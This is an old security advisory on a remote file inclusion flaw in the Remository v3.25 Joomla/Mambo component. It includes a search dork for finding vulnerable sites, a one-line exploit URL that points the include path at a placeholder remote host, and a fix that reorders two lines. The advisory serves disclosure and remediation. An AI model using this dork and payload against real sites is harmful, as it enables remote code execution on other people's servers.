Mambo/Joomla Component Remository v3.25 (mosConfig_absolute_path) Remote File Inclusion Vulnerability

2006.08.15
Credit: camino
Risk: High
Local: No
Remote: Yes
CWE: CWE-94


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

.:[ insecurity research team ]:. .__..____.:.______.____.:.____ . .:. | |/ :/ ___// __ :/ _.:. : | | | \____\ ___/ /__ :. . ..: |__|___| /____ >___ >___ >.: .:.. .. ./ .:/:. ./. .:/: . ...:. .advisory. .:... :..................: o9.o8.2oo6 .. Affected Application: Remository v3.25 (Mambo/Joomla CMS Component) . . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . Discoverd by: camino Team: Insecurity Research Team URL: http://www.insecurityresearch.org E-Mail: camino (at) sexmagnet (dot) com [email concealed] . . :[ insecure application details ]: . . . . . . . . . . . . . . . . . Typ: Remote [x] Local [ ] Remote File Inclusion [x] SQL Injection [ ] Level: Low [ ] Middle [x] High [ ] Application: Remository Version: 3.25 Vulnerable File: admin.remository.php URL: http://www.remository.com Description: It's a component that works with Mambo CMS 4.5+ to provide a selection of files that users can download. Dork: intext:"Remository 3.25. is technology by Black Sheep Research" inurl:"com_remository" . . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . http://[sitepath]/[joomlapath]/administrator/components/ com_remository/admin.remository.php?mosConfig_absolute_path=http://huh? . . :[ how to fix ]: . . . . . . . . . . . . . . . . . . . . . . . . . . o1.) open admin.remository.php o2.) take a look at line 16: require_once ($mosConfig_absolute_path.'/components/ com_remository/com_remository_constants.php'); o3.) take a look at line 19: defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' ); o4.) exchange line 19 with line 16! . . :[ greets ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . . brOmstar and all the sexy members of insecurity research team ;-)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top